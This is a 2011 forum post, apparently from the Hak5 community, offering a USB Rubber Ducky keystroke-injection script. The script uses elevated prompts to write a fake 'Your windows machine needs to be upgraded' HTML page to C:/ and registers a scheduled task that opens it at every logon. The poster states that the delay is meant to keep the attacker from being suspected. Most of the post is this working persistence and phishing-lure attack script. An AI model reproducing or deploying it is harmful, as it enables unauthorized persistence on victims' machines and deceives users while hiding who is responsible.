tbstuntz Posted October 14, 2011 Share Posted October 14, 2011 (edited) This idea was to set a scheduled task to run on logon, in this case load an HTML page. Instead of the content/exploit being setup instantly, i.e when your still near the target machine, it would be scheduled to run later to erase any suspicion that you were involved. Just another concept for the ducky community:) REM Author : Stuntz REM Description : Creates index.html stored in C:/ and automatically opens it when user logs in. REM Version : 0.1 CONTROL ESCAPE DELAY 200 STRING notepad.exe DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER DELAY 500 STRING <html> ENTER STRING <body> ENTER STRING <h1>Your windows machine needs to be upgraded</h1> ENTER STRING <input type="submit" value="Update Now" /> ENTER STRING HAK5 DUCKY ENTER CONTROL s DELAY 100 STRING index.html TAB DOWNARROW DOWNARROW TAB TAB TAB TAB TAB ENTER STRING C:/ ENTER SHIFT TAB DELAY 100 SHIFT TAB DELAY 100 ENTER DELAY 100 ALT F4 DELAY 100 CONTROL ESCAPE DELAY 200 STRING cmd DELAY 200 MENU DELAY 100 STRING a ENTER DELAY 200 LEFT ENTER DELAY 1000 STRING schtasks /Create /TN Hak5Update /SC ONLOGON /TR "C:\index.html" ENTER DELAY 100 STRING exit ENTER Just read on another post from Darren that with the new firmware the Ducky will support on board file storage so that kind of eliminates the need of this to download a file.Oh well might be of some use. Edited October 14, 2011 by tbstuntz Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.